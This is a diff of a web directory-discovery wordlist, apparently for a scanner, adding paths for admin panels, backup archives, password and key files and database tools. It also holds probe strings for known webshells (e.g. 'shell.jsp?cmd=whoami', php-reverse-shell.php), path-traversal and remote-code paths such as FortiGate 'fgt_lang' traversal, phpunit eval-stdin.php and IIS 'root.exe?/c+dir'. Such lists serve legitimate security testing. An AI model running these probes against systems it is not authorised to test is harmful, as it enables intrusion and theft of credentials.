+manager/jmxproxy +manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY +manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage +manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS +manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps= +manager/jmxproxy/?qry=STUFF +manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE manager/login manager/login.asp manager/status/all +manifest.json manifest.mf manifest.yml manifest/cache/ manifest/logs/ manifest/tmp/ +mantis/verify.php?id=1&confirm_hash= +mantisBT/verify.php?id=1&confirm_hash= +manual +manual/index.html manuallogin/ +manuals +map +map.%EXT% +map_admin +mapadmin +mapix/doc/en/changes.html +mapix/mapix/doc/en/changes.html +mapping mappings mappings.json +maps +market +master-admin master.passwd master.tar master.tar.bz2 @@ -5111,53 +8608,95 @@ master.tar.gz master.zip master/ master/portquotes_new/admin.log +master_admin +masteradmin +masteradmin.%EXT% mattermost/ maven/ +max-admin +maxiadmin +mazentop-admin mbox +mcadmin mcollective/ mcx/ mcx/mcxservice.svc mdate-sh me5.jsp me5.jsp?pwd=me5&cmd=whoami +meaweb/os/mxperson +media media.tar media.tar.bz2 media.tar.gz media.zip media/ media/export-criteo.xml +media_admin meet/ meeting/ +memadmin member +member-login +member.%EXT% member.php member/ member/admin.asp +member/login +member/login.%EXT% member/login.asp +member/login.html +member/login.jsp +member/login.py +member/login.rb +member/logon +member/signin memberadmin +memberadmin.%EXT% memberadmin.php memberadmin/ memberlist +memberlist.%EXT% members +members.%EXT% +members.cgi members.csv +members.htm +members.html +members.jsp members.log members.mdb members.php +members.pl +members.py +members.rb +members.shtml members.sql members.sql.gz members.sqlite members.txt members.xls members/ +members/login +members/login.%EXT% +members/login.html +members/login.jsp +members/logon +members/signin membersonly memcached/ memlogin/ +menu menu.jsp menuSys.jsp menuSys.jsp?ls=whoami +merchantadmin mercurial.ini mercurial/ mesos/ +messages meta_login/ +metaadmin metadata.rb metric/ metric_tracking @@ -5165,48 +8704,85 @@ metric_tracking.json metrics metrics.json metrics/ +mfr_admin mg.jsp +mgmt +mgmt.%EXT% +mgmt/tm/sys/management +mh_admin +mhadmin +microsoft microsoft-server-activesync/ mics/ mics/mics.html mifs/ +mifs/c/d/android.html +mifs/login.jsp mifs/user/index.html +mifs/user/login.jsp +mime mimosa-config.coffee mimosa-config.js minupload.jsp mirror.cfg mirror/ misc +misc.php missing mkdocs.yml +mliveadmin +mmadmin +mmwip +mmwip.%EXT% mmym520.jsp moadmin.php moadmin/ +mobile +mobile.%EXT% +mobile/error mock/ +modcp +modcp.%EXT% modelsearch/ +modelsearch/admin.%EXT% modelsearch/admin.html modelsearch/admin.php +modelsearch/index.%EXT% modelsearch/index.html modelsearch/index.php modelsearch/login +modelsearch/login.%EXT% modelsearch/login.html modelsearch/login.php moderator +moderator.%EXT% moderator.html moderator.php moderator/ moderator/admin +moderator/admin.%EXT% moderator/admin.html moderator/admin.php moderator/login +moderator/login.%EXT% moderator/login.html moderator/login.php modern.json modern.jsonp modify_supplier.jsp +module/tiny_mce +module/tinymce +modules +modules.%EXT% modules.order modules/ +modules/TinyMCE/TinyMCEModuleInfo.js modules/admin/ +modules/getdata.php +modules/vendor/phpunit/phpunit/phpunit +modules/web.config +modules_admin +moinmail mongo/ mongodb/ monit/ @@ -5214,31 +8790,73 @@ monitor monitor/ monitoring monitoring/ +moodle +more +movies moving.page +mp3 +mp_admin mrtg.cfg +mrtg/ +ms-admin ms231.jsp +msadc/ +msadc/Samples/selector/showcode.asp +msdac/root.exe?/c+dir msg/ msg_gen/ +mspress30 +msql msql/ +mssql mssql/ +mt mt-check.cgi +mt-xmlrpc.cgi +mt.cgi +mt/mt-xmlrpc.cgi +mt/mt.cgi +mt7/mt-xmlrpc.cgi +mt7/mt.cgi +multimedia +munin munin/ muracms.esproj +music +mutillidae/ mw-config/ +mwaextraadmin4 +mweb mx.php +my-admin my.7z +my.key my.rar my.tar my.tar.bz2 my.tar.gz my.zip +my_admin +myaccount.%EXT% myadm/ +myadmin +myadmin%EXT% myadmin/ myadmin/index.php myadmin/scripts/setup.php myadmin2/index.php +myadminbreeze myadminscripts/ myadminscripts/setup.php +myazadmin +myblog-admin +myconfigs/ +mydomain +mygacportadmin +myphpadmin +myservlet +mysql +mysql-admin mysql-admin/ mysql-admin/index.php mysql.err @@ -5260,21 +8878,31 @@ mysql/pma/ mysql/scripts/setup.php mysql/sqlmanager/ mysql/web/ +mysql_admin mysql_debug.sql +mysqladmin mysqladmin/ mysqladmin/index.php mysqladmin/scripts/setup.php +mysqldump.sql mysqldumper/ mysqlitedb.db +mysqlmanager mysqlmanager/ mysql数据库脱单个表.jsp +mytag_js.js myxx.jsp myxx1.jsp +n +nadmin naginator/ +nagios nagios/ +names.nsf/People?OpenView nano.save native_stderr.log native_stdout.log +nav navSiteAdmin/ nb-configuration.xml nbactions.xml @@ -5283,8 +8911,18 @@ nbproject/private/private.properties nbproject/private/private.xml nbproject/project.properties nbproject/project.xml +ncadmin +netadmin +netadmin.%EXT% +netadmin.htm +netadmin.html +netadmin.jsp +netadmin.shtml netdata/ netspy.jsp +network +new +new.%EXT% new.7z new.php new.rar @@ -5292,9 +8930,26 @@ new.tar new.tar.bz2 new.tar.gz new.zip +new_admin +newadmin +newattachment.%EXT% newbbs/ newbbs/login +newreply.%EXT% +news +news-admin +news.%EXT% +news_admin +news_admin.%EXT% +newsadmin newsadmin/ +newsletter +newsletter-admin +newsletter/ +newsletteradmin +newsletters +newthread.%EXT% +nextcloud nextcloud/ nfs/ ng-cli-backup.json @@ -5310,12 +8965,18 @@ ngx_pagespeed_beacon/ ni.jsp nia.cache nimcache/ +nimda/ +nl nlia.cache nmapunix.jsp no.jsp +node node-role.kubernetes.io +node.xml +node/1?_format=hal_json node_modules node_modules/ +nodes nogfw.jsp nohup.out nosetests.xml @@ -5325,24 +8986,41 @@ nra.cache nst.php nstview.php nsw/ +nsw/admin/login.%EXT% nsw/admin/login.php +ntadmin +nucleus/documentation/history.html +null +null.htw nullca6.jsp nullca666.jsp nullcmd2.jsp nulllist.jsp +nusoap +nwadmin nwp-content/ nwp-content/plugins/disqus-comment-system/disqus.php nytprof.out +o o01561023045980.jsp oab/ +oauth +oauth.%EXT% +oauth/login/ +oauth/signin/ +obj.pkl obj/ +objects ocp.php ocsp/ odbc +ojspdemos ok.jsp ok3.jsp +oladmin olap/ old +old.%EXT% old.7z old.htaccess old.htpasswd @@ -5352,33 +9030,63 @@ old.tar.bz2 old.tar.gz old.zip old/ +old/vendor/phpunit/phpunit/phpunit +old_admin old_files old_site/ +oldadmin oldfiles +oldsite/vendor/phpunit/phpunit/phpunit ona one.jsp one1.jsp one8.jsp +oneadmin +online +online.%EXT% +onlineadmin +onlinegradingsystem oo.jspx opa-debug-js +opadmin +opc/ +opc/services/BrokerServiceIntfPort +opc/services/BrokerServiceIntfPort/wsdl/ +opc/services/OrderTrackingIntfPort +opc/services/OrderTrackingIntfPort/wsdl/ +opc/services/PurchaseOrderIntfPort +opc/services/PurchaseOrderIntfPort/wsdl/ +opcache open-flash-chart.swf?get-data=xss +openadmin openshift/ openstack/ opentsdb/ openvpnadmin/ operador/ +operator +operator.%EXT% operator/ +opinion oprocmgr-service oprocmgr-status ops/ +opt +options +options.%EXT% oracle oracle.jsp oracle脱裤脚本.jsp +orasso +order +order.%EXT% order.log order.txt order_add_log.txt +order_admin order_log orders +orders.%EXT% orders.csv orders.log orders.sql @@ -5387,47 +9095,80 @@ orders.txt orders.xls orders_log orleans.codegen.cs +os-admin +os/mxperson +osCadmin +os_admin +osadmin +oscommerce ospfd.conf +osticket osticket/ +other otrs/ +out.cgi out.txt out/ output output-build.txt output.jsp output/ +overview +owa owa/ +owfadmin +owncloud owncloud/ +owncloud/config/ +oxebiz_admin +p p.php p/ p/m/a/ p1.jsp +p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=dir +package package-cache package-lock.json package.json package/ packer_cache/ +padmin +page +page.%EXT% page.jsp pagerduty/ +pages +pages.%EXT% pages/ pages/admin/ pages/admin/admin-login +pages/admin/admin-login.%EXT% pages/admin/admin-login.html pages/admin/admin-login.php +pages/includes/status painel/ painel/config/config.php.example paket-files/ panel +panel-administracion panel-administracion/ +panel-administracion/admin.%EXT% panel-administracion/admin.html panel-administracion/admin.php +panel-administracion/index.%EXT% panel-administracion/index.html panel-administracion/index.php panel-administracion/login +panel-administracion/login.%EXT% panel-administracion/login.html panel-administracion/login.php +panel.%EXT% panel.php panel/ +papers +partner +partners parts/ pass pass.dat @@ -5439,48 +9180,81 @@ passwd passwd.adjunct passwd.bak passwd.txt +passwd/ password +password.%EXT% password.html password.log password.mdb password.sqlite password.txt +passwordlist.txt +passwordlist/ +passwordlists/ passwords passwords.html passwords.mdb passwords.sqlite passwords.txt +passwords/ +patch path/ path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf +patient/login.do +patient/register.do pause pause.json paxmac.jspx paxmac.jspx~ +payment.%EXT% payment.log payment_authorizenet.log payment_paypal_express.log +payments +payments.%EXT% +pb-admin pb.jsp +pbadmin +pbmadmin pbmadmin/ +pbserver/pbserver.dll pbx/ +pcadmin +pdf +pdf_admin +peienadmin pentaho/ +people +peradmin +perl perl-reverse-shell.pl perlcmd.cgi persistentchat/ personal personal.mdb personal.sqlite +petstore +petstore/ pg_hba.conf pgadmin pgadmin.log pgadmin/ phinx.yml +phmyadmin phoenix +phone phoneconferencing/ +photo +photoadmin +photos +photos.%EXT% php php-backdoor.php +php-bin/ php-cgi.core php-cli.ini php-cs-fixer.phar +php-error php-error.log php-error.txt php-errors.log @@ -5490,10 +9264,13 @@ php-fpm/ php-fpm/error.log php-fpm/www-error.log php-info.php +php-my-admin php-my-admin/ +php-myadmin php-myadmin/ php-reverse-shell.php php-tiny-shell.php +php.%EXT% php.core php.error.log php.ini @@ -5505,8 +9282,10 @@ php.lnk php.log php.php php/ +php/adminer.php php/dev/ php/php.cgi +php/phpmyadmin/ php4.ini php5.fcgi php5.ini @@ -5518,6 +9297,8 @@ phpMoAdmin/ phpMy/ phpMyA/ phpMyAdmi/ +phpMyAdmin +phpMyAdmin-2 phpMyAdmin-2.10.0/ phpMyAdmin-2.10.1/ phpMyAdmin-2.10.2/ @@ -5539,64 +9320,123 @@ phpMyAdmin-2.11.8.1-all-languages-utf-8-only/ phpMyAdmin-2.11.8.1-all-languages/ phpMyAdmin-2.11.8.1/ phpMyAdmin-2.11.9/ +phpMyAdmin-2.2.3 phpMyAdmin-2.2.3/ +phpMyAdmin-2.2.6 phpMyAdmin-2.2.6/ +phpMyAdmin-2.5.1 phpMyAdmin-2.5.1/ +phpMyAdmin-2.5.4 phpMyAdmin-2.5.4/ +phpMyAdmin-2.5.5 +phpMyAdmin-2.5.5-pl1 phpMyAdmin-2.5.5-pl1/ +phpMyAdmin-2.5.5-rc1 phpMyAdmin-2.5.5-rc1/ +phpMyAdmin-2.5.5-rc2 phpMyAdmin-2.5.5-rc2/ phpMyAdmin-2.5.5/ +phpMyAdmin-2.5.6 +phpMyAdmin-2.5.6-rc1 phpMyAdmin-2.5.6-rc1/ +phpMyAdmin-2.5.6-rc2 phpMyAdmin-2.5.6-rc2/ phpMyAdmin-2.5.6/ +phpMyAdmin-2.5.7 +phpMyAdmin-2.5.7-pl1 phpMyAdmin-2.5.7-pl1/ phpMyAdmin-2.5.7/ +phpMyAdmin-2.6.0 +phpMyAdmin-2.6.0-alpha phpMyAdmin-2.6.0-alpha/ +phpMyAdmin-2.6.0-alpha2 phpMyAdmin-2.6.0-alpha2/ +phpMyAdmin-2.6.0-beta1 phpMyAdmin-2.6.0-beta1/ +phpMyAdmin-2.6.0-beta2 phpMyAdmin-2.6.0-beta2/ +phpMyAdmin-2.6.0-pl1 phpMyAdmin-2.6.0-pl1/ +phpMyAdmin-2.6.0-pl2 phpMyAdmin-2.6.0-pl2/ +phpMyAdmin-2.6.0-pl3 phpMyAdmin-2.6.0-pl3/ +phpMyAdmin-2.6.0-rc1 phpMyAdmin-2.6.0-rc1/ +phpMyAdmin-2.6.0-rc2 phpMyAdmin-2.6.0-rc2/ +phpMyAdmin-2.6.0-rc3 phpMyAdmin-2.6.0-rc3/ phpMyAdmin-2.6.0/ +phpMyAdmin-2.6.1 +phpMyAdmin-2.6.1-pl1 phpMyAdmin-2.6.1-pl1/ +phpMyAdmin-2.6.1-pl2 phpMyAdmin-2.6.1-pl2/ +phpMyAdmin-2.6.1-pl3 phpMyAdmin-2.6.1-pl3/ +phpMyAdmin-2.6.1-rc1 phpMyAdmin-2.6.1-rc1/ +phpMyAdmin-2.6.1-rc2 phpMyAdmin-2.6.1-rc2/ phpMyAdmin-2.6.1/ +phpMyAdmin-2.6.2 +phpMyAdmin-2.6.2-beta1 phpMyAdmin-2.6.2-beta1/ +phpMyAdmin-2.6.2-pl1 phpMyAdmin-2.6.2-pl1/ +phpMyAdmin-2.6.2-rc1 phpMyAdmin-2.6.2-rc1/ phpMyAdmin-2.6.2/ +phpMyAdmin-2.6.3 +phpMyAdmin-2.6.3-pl1 phpMyAdmin-2.6.3-pl1/ +phpMyAdmin-2.6.3-rc1 phpMyAdmin-2.6.3-rc1/ phpMyAdmin-2.6.3/ +phpMyAdmin-2.6.4 +phpMyAdmin-2.6.4-pl1 phpMyAdmin-2.6.4-pl1/ +phpMyAdmin-2.6.4-pl2 phpMyAdmin-2.6.4-pl2/ +phpMyAdmin-2.6.4-pl3 phpMyAdmin-2.6.4-pl3/ +phpMyAdmin-2.6.4-pl4 phpMyAdmin-2.6.4-pl4/ +phpMyAdmin-2.6.4-rc1 phpMyAdmin-2.6.4-rc1/ phpMyAdmin-2.6.4/ +phpMyAdmin-2.7.0 +phpMyAdmin-2.7.0-beta1 phpMyAdmin-2.7.0-beta1/ +phpMyAdmin-2.7.0-pl1 phpMyAdmin-2.7.0-pl1/ +phpMyAdmin-2.7.0-pl2 phpMyAdmin-2.7.0-pl2/ +phpMyAdmin-2.7.0-rc1 phpMyAdmin-2.7.0-rc1/ phpMyAdmin-2.7.0/ +phpMyAdmin-2.8.0 +phpMyAdmin-2.8.0-beta1 phpMyAdmin-2.8.0-beta1/ +phpMyAdmin-2.8.0-rc1 phpMyAdmin-2.8.0-rc1/ +phpMyAdmin-2.8.0-rc2 phpMyAdmin-2.8.0-rc2/ +phpMyAdmin-2.8.0.1 phpMyAdmin-2.8.0.1/ +phpMyAdmin-2.8.0.2 phpMyAdmin-2.8.0.2/ +phpMyAdmin-2.8.0.3 phpMyAdmin-2.8.0.3/ +phpMyAdmin-2.8.0.4 phpMyAdmin-2.8.0.4/ phpMyAdmin-2.8.0/ +phpMyAdmin-2.8.1 +phpMyAdmin-2.8.1-rc1 phpMyAdmin-2.8.1-rc1/ phpMyAdmin-2.8.1/ +phpMyAdmin-2.8.2 phpMyAdmin-2.8.2/ phpMyAdmin-2/ phpMyAdmin-3.0.0/ @@ -5623,6 +9463,7 @@ phpMyAdmin-3.3.4-rc1/ phpMyAdmin-3.3.4/ phpMyAdmin-3/ phpMyAdmin-4/ +phpMyAdmin.%EXT% phpMyAdmin.old/index.php phpMyAdmin/ phpMyAdmin/index.php @@ -5630,6 +9471,7 @@ phpMyAdmin/phpMyAdmin/index.php phpMyAdmin/scripts/setup.php phpMyAdmin0/ phpMyAdmin1/ +phpMyAdmin2 phpMyAdmin2/ phpMyAdmin3/ phpMyAdmin4/ @@ -5648,6 +9490,8 @@ php_error.log php_error_log php_errorlog php_errors.log +php_my_admin +phpadmin phpadmin/ phpadmin/index.php phpadminmy/ @@ -5679,19 +9523,28 @@ phpm/ phpma/ phpma/index.php phpmailer +phpmanager phpmanager/ phpmem/ phpmemcachedadmin/ phpminiadmin.php phpminiadmin/ phpmoadmin/ +phpmy-admin phpmy-admin/ phpmy/ phpmyAdmin/ phpmyad-sys/ phpmyad/ +phpmyadmin +phpmyadmin!! +phpmyadmin-old phpmyadmin-old/index.php phpmyadmin/ +phpmyadmin/ChangeLog +phpmyadmin/README +phpmyadmin/doc/html/index.html +phpmyadmin/docs/html/index.html phpmyadmin/index.php phpmyadmin/phpmyadmin/index.php phpmyadmin/scripts/setup.php @@ -5699,6 +9552,7 @@ phpmyadmin0/ phpmyadmin0/index.php phpmyadmin1/ phpmyadmin1/index.php +phpmyadmin2 phpmyadmin2/ phpmyadmin2/index.php phpmyadmin2011/ @@ -5709,6 +9563,7 @@ phpmyadmin2015/ phpmyadmin2016/ phpmyadmin2017/ phpmyadmin2018/ +phpmyadmin3 phpmyadmin3/ phpmyadmin4/ phppgadmin @@ -5716,6 +9571,7 @@ phppgadmin/ phppma/ phpredmin/ phproad/ +phpsecinfo phpsecinfo/ phpspec.yml phpstudy.php @@ -5724,16 +9580,34 @@ phptest.php phpunit.phar phpunit.xml phpunit.xml.dist +phpunit/Util/PHP/eval-stdin.php +phpunit/phpunit/Util/PHP/eval-stdin.php +phpunit/phpunit/src/Util/PHP/eval-stdin.php +phpunit/src/Util/PHP/eval-stdin.php +phpversion.php +phreebooks +phymyadmin phymyadmin/ +physican/login.do pi.php pi.php5 +pics +pictures pids pinfo.php +ping pip-delete-this-directory.txt pip-log.txt +pipermail piwigo/ piwigo/extensions/UserCollections/template/ZeroClipboard.swf +piwik +piwik/ +pix +pixel pkg/ +pkginfo +pl planning/cfg planning/docs planning/src @@ -5741,25 +9615,40 @@ platz_login/ play-cache play-stash player.swf +playground playground.xcworkspace +plesk-stat +plesk-stat/anon_ftpstat/ +plesk-stat/ftpstat/ +pls +pls/dad/null plugin.xml +plugin/build plugins plugins.log plugins/ plugins/editors/fckeditor plugins/fckeditor +plugins/servlet/gadgets/makeRequest +plugins/servlet/gadgets/makeRequest?url=https://google.com +plugins/servlet/oauth/users/icon plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload.swf plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf +plugins/tiny_mce plugins/tiny_mce/ +plugins/tinymce plugins/tinymce/ plugins/upload.php plugins/web.config plupload +plus pm_to_blib +pma pma-old/index.php pma/ pma/index.php pma/scripts/setup.php +pma2005 pma2005/ pma2009/ pma2011/ @@ -5771,70 +9660,158 @@ pma2016/ pma2017/ pma2018/ pma4/ +pmadmin pmadmin/ pmamy/index.php pmamy2/index.php pmd/index.php +pmyadmin pmyadmin/ +pn-admin +podcast +podcasts +podcasts_admin +pods +policies +policy +politics +poll +poll.%EXT% +pollbooth.%EXT% pom.xml pom.xml.asc pom.xml.next pom.xml.releaseBackup pom.xml.tag pom.xml.versionsBackup +pop_profile.php +popup.htm +popup.html +popup_image.php +popup_songs.php port.jsp +portal portal/ +portal2 +portal30 +portal30_sso portalAppAdmin/login.jsp +portaladmin +post +post.html +postfixadmin postgresql.conf +postinfo.html +postings.%EXT% +posts +posts.%EXT% power_user/ powershell/ +pprof pprof/ +pr +pradmin +press +print +print.%EXT% printenv printenv.tmp +printer +printthread.%EXT% priv8.php +privacy +privacy.%EXT% +privacy_policy +privacypolicy +private +private.%EXT% private.key private.mdb private.sqlite +privatekey.key +privmsg.%EXT% +proc/sys/kernel/core_pattern processlogin processlogin.php +procmail +prod-api/druid/index.html +product +product.%EXT% product.json +product_reviews.%EXT% +productcockpit productcockpit/ production.log +products +products.%EXT% +profile +profile.%EXT% profiles profiles.xml +profiles/minimal/minimal.info +profiles/standard/standard.info +profiles/testing/testing.info program/ +programs +progra~1 proguard/ +project project-admins/ +project.%EXT% project.fragment.lock.json project.lock.json project.xml project/project project/target +projects +projects.%EXT% prometheus prometheus/ prometheus/targets +promo +propadmin propel.ini propel.json +properties protected/data/ protected/runtime/ +protected_access/ +provider.tf providers.json +proxy +proxy.ini proxy.pac proxy.stream?origin=https://google.com proxy/ proxy_config.json +prtg/index.htm +prv prv/ +prweb/PRRestService/unauthenticatedAPI/v1/docs +ps_admin.cgi psquare/x.jsp +ptadmin +pub public +public.%EXT% public.. public/ +public/adminer.php public/hot public/storage public/system +public_html +public_html/robots.txt +publicadminer.php publication_list.xml +publications publish/ +publisher +pubs pubspec.lock puppet/ pureadmin/ +put putty.reg pw.txt pwd.db @@ -5845,14 +9822,25 @@ pwnx32020.jsp pws.txt py-compile pyth.jsp +q qa/ +qdadmin +qmail +qmailadmin qq.jsp qq.php qql/ qsd-php-backdoor.php +query query.log queryDong.jsp +queryhit.htm +quickadmin quikstore.cfg +qwadmin +qwertypoiu.htw +qwertypoiu.printer +r r.php r00t.php r57.php @@ -5861,20 +9849,31 @@ r57shell.php r58.php r99.php rabbitmq/ +rack_session +rack_session/edit +radio radius/ +radmin radmind-1/ radmind/ +railo-context/admin/web.cfm +rails/actions rails/info/properties +rap_admin +rating_over. raygun/ rcLogin/ rcf/ rcjakar/ rcjakar/admin/login.php +rd.%EXT% rdoc/ re.jsp reDuh.jsp reach/sip.svc read.me +read_file +readfile readme readme.html readme.md @@ -5883,66 +9882,131 @@ readme.php readme.txt rebel.jsp rebel1.jsp +recaptcha +receiver.%EXT% recentservers.xml +recherche.html +recommend.%EXT% +recover +recoverpassword +recoverpassword.%EXT% +redadmin +redirect +redirect.%EXT% redis/ +redmine redmine/ refresh refresh.json regApp.jsp +regadmin +register +register.%EXT% register.php +registration registration/ registry/ rel/example_project +release release.properties +releases relogin relogin.htm relogin.html relogin.php +remote-entry/ remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession +remote/login +remote_adm/ +removeNodeListener +rentalsadmin +reorder.php +reply repo/ +report +report.%EXT% +reports +reports.%EXT% +reports/Webalizer/ +repository +reputation.%EXT% request.log requesthandler/ requesthandlerext/ requirements.txt rerun.txt +research reseller +reset +reset.html +resolute.php?img=config.php +resource +resource.%EXT% +resources +resources.%EXT% resources.xml resources/ resources/.arch-internal-preview.css resources/fckeditor resources/sass/.sass-cache/ resources/tmp/ +rest rest-api/ rest-auth/ rest/ +rest/api/2/dashboard +rest/api/2/issue/createmeta +rest/api/2/project +rest/api/latest/groupuserpicker +rest/beta/repositories/go/group +rest/tinymce/1/macro/preview rest/v1 rest/v3/doc restart restart.json restore.php restricted +restricted_access/ +result.%EXT% +results resume resume.json +review +review.%EXT% +reviews +reviews.%EXT% revision.inc revision.txt rgs/ rgsclients/ ringzer0.jsp +rmsadmin robot.txt robots.txt robots.txt.dist +root root/ +rootadmin roundcube/index.php +rpc.%EXT% rpc/ +rpc_admin rpcwithcert/ rsconnect/ +rss +rss.%EXT% rst.php +ru +rubrique.%EXT% rudder/ +run run.sh runtime_messages.jsp +s s.jsp s.php +s/sfsites/aura s01.jsp s02.jsp s03.jsp @@ -5951,61 +10015,130 @@ s08.jsp s09.jsp s10.jsp s11.jsp +s2dshopadmin.php s8Jn4gWlqX2c5.jsp s8Jn4gWlqX2c5.jsp?cmd=whoami sJn4gWlqX1c592.jsp sYm.php sa.php sa2.php +sadmin +sales-admin sales.csv sales.log sales.sql sales.sql.gz sales.txt sales.xls +salesadmin salesforce.schema saltstack/ +sample sample.txt sample.txt~ +samples +samples/ +samples/activitysessions +samples/activitysessions/ +sap/hana/xs/formLogin/login.html +sat_admin satan.jsp +save +sbadmin sbt/ sc.jsp sca/menu.jsp scalyr/ scheduledtasks +scheduler scheduler/ +scheduler/docs/ +schema schema.sql schema.yml +schoolmanagement +science +screenshots +script script/ script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf scripts scripts/ +scripts/cgimail.exe scripts/ckeditor/ckfinder/core/connector/asp/connector.asp scripts/ckeditor/ckfinder/core/connector/aspx/connector.aspx scripts/ckeditor/ckfinder/core/connector/php/connector.php +scripts/convert.bas +scripts/counter.exe +scripts/fpcount.exe +scripts/iisadmin/ism.dll?http/dir +scripts/no-such-file.pl +scripts/root.exe?/c+dir +scripts/samples/ +scripts/samples/search/webhits.exe scripts/setup.php +scripts/tiny_mce +scripts/tinymce +scripts/tools/getdrvs.exe +scripts/tools/newdsn.exe sda.jsp sdb.php sdist/ +sdk/ +sdzxadmin +search +search.%EXT% +search_admin searchreplacedb2.php searchreplacedb2cli.php +searchresults.%EXT% +searchresults.html secret secret/ +secretadmin +secrets secrets.env secrets/ secring.bak secring.pgp secring.skr +section +secure +secure.%EXT% secure/ +secure/ConfigurePortalPages!default.jspa?view=popular +secure/ContactAdministrators!default.jspa +secure/Dashboard.jspa +secure/QueryComponent!Default.jspa +secure/ViewUserHover.jspa +secure/downloadFile/ +secure/popups/UserPickerBrowser.jspa +secure_admin +secureadmin +securecleanup +secured +secureemail +security +security.txt +security.xml security/ selenium/ +sell +sem/ sendgrid.env +sendmail +sendmessage.%EXT% sensu/ sentemails.log sentry/ +seoadmin +serial serv-u.ini +server server-info +server-status server-status/ +server.%EXT% server.cert server.cfg server.js @@ -6019,28 +10152,67 @@ server/server.js serverStatus.log server_admin_small/ server_stats +serveradmin +serverindex.xml +servers servers.xml +service service-registry/instance-status service-registry/instance-status.json service.asmx +service.grp +service.pwd service.yaml +service?Wsdl serviceInstitutionConfig_init.jsp serviceaccount.crt +servicedesk +servicedesk/customer/user/login +servicedesk/customer/user/signup services services/ services/config/databases.yml +servlet servlet/ servlet/%C0%AE%C0%AE%C0%AF +servlet/ControllerServlet servlet/DMSDump +servlet/ErrorReporter +servlet/HelloWorldServlet +servlet/HitCount servlet/Oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml servlet/Oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml +servlet/SimpleServlet servlet/SnoopServlet servlet/Spy +servlet/TheExpiringHTMLServlet +servlet/WebSphereSamples.Configuration.config +servlet/WebSphereSamples.Form.FormServlet +servlet/WebSphereSamples.YourCo.News.NewsServlet +servlet/aphtpassword +servlet/com.ibm.as400ad.webfacing.runtime.httpcontroller.ControllerServlet +servlet/com.ibm.servlet.engine.webapp.DefaultErrorReporter +servlet/com.ibm.servlet.engine.webapp.InvokerServlet +servlet/com.ibm.servlet.engine.webapp.SimpleFileServlet +servlet/com.ibm.servlet.engine.webapp.UncaughtServletException +servlet/com.ibm.servlet.engine.webapp.WebAppErrorReport +servlet/hello servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml +servlet/snoop +servlet/snoop2 +servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https +servletcache +servletimages +servlets/ +session session/ sessions sessions/ +sessions/new +settings +settings.%EXT% +settings.html settings.php settings.php.bak settings.php.dist @@ -6058,10 +10230,18 @@ setup.log setup.php setup.sql setup/ +sfsites/aura sftp-config.json sh.jsp shaoyu.jsp +share +share/ +share/page/dologin +shared +sharedadmin sheep.php +shell +shell.%EXT% shell.jsp shell.jspx shell.php @@ -6071,11 +10251,43 @@ shell0643.jsp?cmd=whoami shell1.jsp shellz.php shen12.jsp +shipping.%EXT% +shop +shop-admin +shop_admin +shopadmin +shopadmin.%EXT% +shopadmin1.%EXT% +shopadmin7963 +shopaffadmin.%EXT% +shopcustadmin.%EXT% shopdb/ +shopping +shopping_cart.%EXT% show +showCfg +show_image_NpAdvCatPG.php?cache=false&cat=1&filename= +show_image_NpAdvFeaThumb.php?cache=false&cat=1&filename= +show_image_NpAdvHover.php?cache=false&cat=0&filename= +show_image_NpAdvInnerSmall.php?cache=false&cat=1&filename= +show_image_NpAdvMainFea.php?cache=false&cat=1&filename= +show_image_NpAdvMainPGThumb.php?cache=false&cat=1&filename= +show_image_NpAdvSecondaryRight.php?cache=false&cat=1&filename= +show_image_NpAdvSideFea.php?cache=false&cat=1&filename= +show_image_NpAdvSinglePhoto.php?cache=false&cat=1&filename= +show_image_NpAdvSubFea.php?cache=false&cat=1&filename= +showadmin +showallsites showcode.asp +showgroups.%EXT% showlogin/ +showpost.%EXT% +showthread +shradmin +shtml.exe shutdown +shutdown.%EXT% +sibstatus sidekiq sidekiq_monitor sign-in @@ -6083,18 +10295,41 @@ sign-in/ sign_in sign_in/ signin +signin.%EXT% +signin.cgi +signin.htm +signin.html +signin.jsp signin.php +signin.pl +signin.py +signin.rb +signin.shtml signin/ +signin/oauth/ +signout +signout.%EXT% +signout/ +signup +signup.%EXT% signup.action silic Shell.jsp silic webshell.jsp +simpapp +simple simple-backdoor.php simple-shell.jsp simple.jsp +simpleFormServlet +simpleJSP simpleLogin/ simple_shell.jsp +simpledad sip/ site +site-admin +site-log/ +site.%EXT% site.rar site.sql site.tar @@ -6105,26 +10340,59 @@ site.zip site/ site/common.xml site_admin +site_map siteadmin siteadmin.php siteadmin/ +siteadmin/index.%EXT% siteadmin/index.php +siteadmin/login.%EXT% siteadmin/login.html siteadmin/login.php +sitecore/content/home +sitecore/content/home.aspx +sitecore/login +sitecore/login/default.aspx +sitedown.%EXT% sitemanager.xml +sitemap sitemap.jsp +sitemap.xml +sitemap.xml.gz +sites sites.ini sites.xml sites/README.txt sites/all/libraries/README.txt +sites/all/libraries/fckeditor +sites/all/libraries/mailchimp/vendor/phpunit/phpunit/phpunit sites/all/modules/README.txt +sites/all/modules/fckeditor sites/all/themes/README.txt sites/example.sites.php +siteserver/publishing/viewcode.asp sized/ +skin +skin.%EXT% +skin1_admin.css +skin_admin +skins +skins.%EXT% +slanadmin slapd.conf +sloth_admin.%EXT% +smartadmin +smarty smblogin/ +smf/ +smilies +snapshot +snoop snoop.jsp +snoop/ +snoop2 snort/ +snp soap/ soap/servlet/Spy soap/servlet/soaprouter @@ -6132,6 +10400,14 @@ 